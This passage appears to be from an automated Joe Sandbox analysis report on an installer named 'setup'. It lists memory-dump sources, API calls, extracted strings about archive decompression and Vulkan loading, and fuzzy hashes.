                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$_close$exit
                                                                                                    • String ID: %s$ERROR: can't alloc %lu memory bytes$ERROR: can't close file %s
                                                                                                    • API String ID: 174611332-2669338241
                                                                                                    • Opcode ID: fbe0195eaaef8453dfa9723c130853ef8579d9347637be0c13f6eb27757d4b91
                                                                                                    • Instruction ID: 1820cdd3e4c492adac3d176fb71a0b5b75546c506f51847798c94b8aad773312
                                                                                                    • Opcode Fuzzy Hash: fbe0195eaaef8453dfa9723c130853ef8579d9347637be0c13f6eb27757d4b91
                                                                                                    • Instruction Fuzzy Hash: 2EA16F706143058FDB10EF28C48471ABBE1FF85310F16896DE9889B346D735D8A1CF92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Vulkan: Failed to query instance extensions: %s, xrefs: 00244E8B
                                                                                                    • Vulkan: Loader not found, xrefs: 00244D90
                                                                                                    • Vulkan: Loader does not export vkGetInstanceProcAddr, xrefs: 00244DAE
                                                                                                    • Vulkan: Failed to query instance extension count: %s, xrefs: 00244D5B
                                                                                                    • vulkan-1.dll, xrefs: 00244CD0
                                                                                                    • VK_KHR_win32_surface, xrefs: 00244E64
                                                                                                    • Vulkan: Failed to retrieve vkEnumerateInstanceExtensionProperties, xrefs: 00244F03
                                                                                                    • vkGetInstanceProcAddr, xrefs: 00244CED
                                                                                                    • VK_KHR_surface, xrefs: 00244E4E
                                                                                                    • vkEnumerateInstanceExtensionProperties, xrefs: 00244D0E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: VK_KHR_surface$VK_KHR_win32_surface$Vulkan: Failed to query instance extension count: %s$Vulkan: Failed to query instance extensions: %s$Vulkan: Failed to retrieve vkEnumerateInstanceExtensionProperties$Vulkan: Loader does not export vkGetInstanceProcAddr$Vulkan: Loader not found$vkEnumerateInstanceExtensionProperties$vkGetInstanceProcAddr$vulkan-1.dll
                                                                                                    • API String ID: 145871493-3031290315
                                                                                                    • Opcode ID: 8cb78db6a91977d147fb037ce5f34590dca7f60781befa190baa7ffb25cc703b
                                                                                                    • Instruction ID: 2eb542590465ad7181d824a3c9b78954d4f0440640c45672b4b8f005a4ee5087
                                                                                                    • Opcode Fuzzy Hash: 8cb78db6a91977d147fb037ce5f34590dca7f60781befa190baa7ffb25cc703b
                                                                                                    • Instruction Fuzzy Hash: 50518FB4A293019FD715BF74E94532B7BE0FB85344F05883DE88887214E7B488A9DB86
                                                                                                    APIs
                                                                                                    • WaitForSingleObject.KERNEL32 ref: 001C60BA
                                                                                                      • Part of subcall function 001EBE70: mbstowcs.MSVCRT ref: 001EBE8E
                                                                                                    • wcscmp.MSVCRT ref: 001C60EE
                                                                                                    • ReleaseMutex.KERNEL32 ref: 001C6151
                                                                                                      • Part of subcall function 001C51C0: CloseHandle.KERNEL32 ref: 001C51D1
                                                                                                      • Part of subcall function 001C51C0: CreateThread.KERNEL32 ref: 001C5284
                                                                                                    • MessageBoxW.USER32 ref: 001C61C7
                                                                                                    • ReleaseMutex.KERNEL32 ref: 001C61D8
                                                                                                    • CreateProcessW.KERNEL32 ref: 001C62A1
                                                                                                    • CloseHandle.KERNEL32 ref: 001C62B7
                                                                                                    • CloseHandle.KERNEL32 ref: 001C62C3
                                                                                                    • ReleaseMutex.KERNEL32 ref: 001C62E5
                                                                                                      • Part of subcall function 001EBCC0: mbstowcs.MSVCRT ref: 001EBCDE
                                                                                                      • Part of subcall function 001C27C0: GetFullPathNameW.KERNEL32 ref: 001C27F2
                                                                                                      • Part of subcall function 001C27C0: wcslen.MSVCRT ref: 001C2806
                                                                                                      • Part of subcall function 001C27C0: wcslen.MSVCRT ref: 001C281C
                                                                                                      • Part of subcall function 001C27C0: wcsncmp.MSVCRT ref: 001C2831
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleMutexRelease$Creatembstowcswcslen$FullMessageNameObjectPathProcessSingleThreadWaitwcscmpwcsncmp
                                                                                                    • String ID: %ls\%ls$Error$Install Game$InstallCallback: MakeValidInstallpathInvalid path.$InstallCallback: swprintfInvalid path.$aA
                                                                                                    • API String ID: 193152645-2585443390
                                                                                                    • Opcode ID: d84d5aaed086f8db001accc088b6e1abda18bb8ee4ca5910f0a7776b860f7d3d
                                                                                                    • Instruction ID: bef217cd90f747040ddbc64497ceacc743718baf50d405725df6bf4878cb8705
                                                                                                    • Opcode Fuzzy Hash: d84d5aaed086f8db001accc088b6e1abda18bb8ee4ca5910f0a7776b860f7d3d
                                                                                                    • Instruction Fuzzy Hash: 9D5114B55097019FD300EF68E98869EBBE0BB94715F01892DE8C887311EB75D488CF97
                                                                                                    APIs
                                                                                                      • Part of subcall function 0020B100: free.MSVCRT ref: 0020B1B2
                                                                                                      • Part of subcall function 0020B100: malloc.MSVCRT ref: 0020B1C1
                                                                                                      • Part of subcall function 0020B100: _lseeki64.MSVCRT ref: 0020B1EB
                                                                                                      • Part of subcall function 0020B100: malloc.MSVCRT ref: 0020B20D
                                                                                                      • Part of subcall function 0020B100: malloc.MSVCRT ref: 0020B223
                                                                                                      • Part of subcall function 0020B100: exit.MSVCRT ref: 0020B265
                                                                                                      • Part of subcall function 0020B100: longjmp.MSVCRT ref: 0020B27F
                                                                                                      • Part of subcall function 0020B100: _read.MSVCRT ref: 0020B29D
                                                                                                      • Part of subcall function 0020B100: malloc.MSVCRT ref: 0020B2C7
                                                                                                      • Part of subcall function 0020B100: malloc.MSVCRT ref: 0020B2DD
                                                                                                    • malloc.MSVCRT ref: 0020B41A
                                                                                                    • malloc.MSVCRT ref: 0020B46C
                                                                                                    • exit.MSVCRT ref: 0020B4C4
                                                                                                    • malloc.MSVCRT ref: 0020B482
                                                                                                      • Part of subcall function 001EE7F0: malloc.MSVCRT ref: 001EE800
                                                                                                      • Part of subcall function 001EE7F0: CharToOemW.USER32 ref: 001EE822
                                                                                                      • Part of subcall function 001EE7F0: free.MSVCRT ref: 001EE82E
                                                                                                    • longjmp.MSVCRT ref: 0020B4E9
                                                                                                    • malloc.MSVCRT ref: 0020B4F7
                                                                                                    • malloc.MSVCRT ref: 0020B50D
                                                                                                    • exit.MSVCRT ref: 0020B557
                                                                                                    • free.MSVCRT ref: 0020B565
                                                                                                    • malloc.MSVCRT ref: 0020B59C
                                                                                                    • malloc.MSVCRT ref: 0020B5AE
                                                                                                    Strings
                                                                                                    • ERROR: can't alloc %lu memory bytes, xrefs: 0020B605
                                                                                                    • %s, xrefs: 0020B4B1, 0020B544
                                                                                                    • ERROR: unsupported compression method "%s", xrefs: 0020B520
                                                                                                    • ERROR: archive structure corrupted (decompression of control block failed), xrefs: 0020B491
                                                                                                    • ERROR: archive structure corrupted (control block failed CRC check), xrefs: 0020B5B9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$exitfree$longjmp$Char_lseeki64_read
                                                                                                    • String ID: %s$ERROR: archive structure corrupted (control block failed CRC check)$ERROR: archive structure corrupted (decompression of control block failed)$ERROR: can't alloc %lu memory bytes$ERROR: unsupported compression method "%s"
                                                                                                    • API String ID: 3950243888-519644090
                                                                                                    • Opcode ID: acb828d260cd1529935b8aa607ec181a1e192a1732dabccd7f0a07080b559e89
                                                                                                    • Instruction ID: 354c8434b8e7224d6f576b347403fd550ebb6f548adc295ea885832b27164e61
                                                                                                    • Opcode Fuzzy Hash: acb828d260cd1529935b8aa607ec181a1e192a1732dabccd7f0a07080b559e89
                                                                                                    • Instruction Fuzzy Hash: E35105B06187099BC721EF69C49121EFBE0BF48740F51C92DE9C897342DBB4D9508F92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Vulkan: Failed to query instance extensions: %s, xrefs: 002447AD
                                                                                                    • Vulkan: Loader not found, xrefs: 00244695
                                                                                                    • Vulkan: Loader does not export vkGetInstanceProcAddr, xrefs: 00244800
                                                                                                    • Vulkan: Failed to query instance extension count: %s, xrefs: 00244788
                                                                                                    • vulkan-1.dll, xrefs: 002445E9
                                                                                                    • VK_KHR_win32_surface, xrefs: 0024472D
                                                                                                    • Vulkan: Failed to retrieve vkEnumerateInstanceExtensionProperties, xrefs: 002447D2
                                                                                                    • vkGetInstanceProcAddr, xrefs: 00244606
                                                                                                    • VK_KHR_surface, xrefs: 002446F6
                                                                                                    • vkEnumerateInstanceExtensionProperties, xrefs: 00244627
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProccalloc
                                                                                                    • String ID: VK_KHR_surface$VK_KHR_win32_surface$Vulkan: Failed to query instance extension count: %s$Vulkan: Failed to query instance extensions: %s$Vulkan: Failed to retrieve vkEnumerateInstanceExtensionProperties$Vulkan: Loader does not export vkGetInstanceProcAddr$Vulkan: Loader not found$vkEnumerateInstanceExtensionProperties$vkGetInstanceProcAddr$vulkan-1.dll
                                                                                                    • API String ID: 2340843210-3031290315
                                                                                                    • Opcode ID: f279b82da9378494ea9bd26b4ff7ccfd44517478b03079893a753b15ef68c94e
                                                                                                    • Instruction ID: be028245dccc53f7e49cd2032f3b24c585f500405196439dcbe4b989bb9b8f03
                                                                                                    • Opcode Fuzzy Hash: f279b82da9378494ea9bd26b4ff7ccfd44517478b03079893a753b15ef68c94e
                                                                                                    • Instruction Fuzzy Hash: E04181B55293018FD714BF74EA4536BBBE4EB46344F02483DE8C887250E7B484A9CF96
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Vulkan: Failed to query instance extensions: %s, xrefs: 002449A8
                                                                                                    • Vulkan: Loader not found, xrefs: 002448EB
                                                                                                    • Vulkan: Loader does not export vkGetInstanceProcAddr, xrefs: 00244A25
                                                                                                    • Vulkan: Failed to query instance extension count: %s, xrefs: 00244A08
                                                                                                    • vulkan-1.dll, xrefs: 00244830
                                                                                                    • VK_KHR_win32_surface, xrefs: 00244980
                                                                                                    • Vulkan: Failed to retrieve vkEnumerateInstanceExtensionProperties, xrefs: 00244A4B
                                                                                                    • vkGetInstanceProcAddr, xrefs: 0024484D
                                                                                                    • VK_KHR_surface, xrefs: 0024494A
                                                                                                    • vkEnumerateInstanceExtensionProperties, xrefs: 0024486E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: VK_KHR_surface$VK_KHR_win32_surface$Vulkan: Failed to query instance extension count: %s$Vulkan: Failed to query instance extensions: %s$Vulkan: Failed to retrieve vkEnumerateInstanceExtensionProperties$Vulkan: Loader does not export vkGetInstanceProcAddr$Vulkan: Loader not found$vkEnumerateInstanceExtensionProperties$vkGetInstanceProcAddr$vulkan-1.dll
                                                                                                    • API String ID: 145871493-3031290315
                                                                                                    • Opcode ID: 8618d104bc51d62f44e2cc8d86859ff095ebc430348b0c20fe67c65ad3f728e6
                                                                                                    • Instruction ID: fc85c881d91e419e1b7395f3a5a501937a63c217f60132f4bc188a0ec3c955f7
                                                                                                    • Opcode Fuzzy Hash: 8618d104bc51d62f44e2cc8d86859ff095ebc430348b0c20fe67c65ad3f728e6
                                                                                                    • Instruction Fuzzy Hash: DC5150B59283419FD714BF74EA4532FBBE0EB45345F11443DE8C88B250E7B488A8DB86
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: exit
                                                                                                    • String ID: :%d$:ah%s$:al%d$:c%d$:fb%d$:h%s$:l%d$:p%d$:s%d$:t%d$:u%d$:x%d$data error$tor%s:%s%s%s%s%s%s%s%s%s%s%s%s
                                                                                                    • API String ID: 2483651598-677178743
                                                                                                    • Opcode ID: 166d99e3f8fd6f9333b8b84138b61182a4599a8f33cb9d72b5c97b7adaf522a2
                                                                                                    • Instruction ID: 2fcd537ceefdc8e309f827bf08bd362c183597edd978649d7ea0b40c7c758573
                                                                                                    • Opcode Fuzzy Hash: 166d99e3f8fd6f9333b8b84138b61182a4599a8f33cb9d72b5c97b7adaf522a2
                                                                                                    • Instruction Fuzzy Hash: 0BB1EEB59097408FC721DF29C18559AFBE4FF89740F51892EE88987316E730E994CF82
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: %s$ERROR: archive data corrupted (decompression fails)$ERROR: can't alloc %lu memory bytes$ERROR: file seek operation failed$ERROR: unsupported compression method %s
                                                                                                    • API String ID: 0-762570233
                                                                                                    • Opcode ID: f49cf1668a89da687b5f1bdfa20cd84ccc379ace8b8bfd244f648a41baeef118
                                                                                                    • Instruction ID: 075d43012debb7a4ed45f487baddc4aa9eb40dcb159d4484b2459652e4636a9c
                                                                                                    • Opcode Fuzzy Hash: f49cf1668a89da687b5f1bdfa20cd84ccc379ace8b8bfd244f648a41baeef118
                                                                                                    • Instruction Fuzzy Hash: F98150B46287069FC760EF28C28062AB7E1BF44714F11857DE9989B782D774EC65CF82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Vulkan: Failed to query instance extensions: %s, xrefs: 00244C28
                                                                                                    • Vulkan: Loader does not export vkGetInstanceProcAddr, xrefs: 00244C4D
                                                                                                    • vulkan-1.dll, xrefs: 00244A90
                                                                                                    • VK_KHR_win32_surface, xrefs: 00244BCD
                                                                                                    • Vulkan: Failed to retrieve vkEnumerateInstanceExtensionProperties, xrefs: 00244C73
                                                                                                    • vkGetInstanceProcAddr, xrefs: 00244AA9
                                                                                                    • VK_KHR_surface, xrefs: 00244B96
                                                                                                    • vkEnumerateInstanceExtensionProperties, xrefs: 00244ACA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
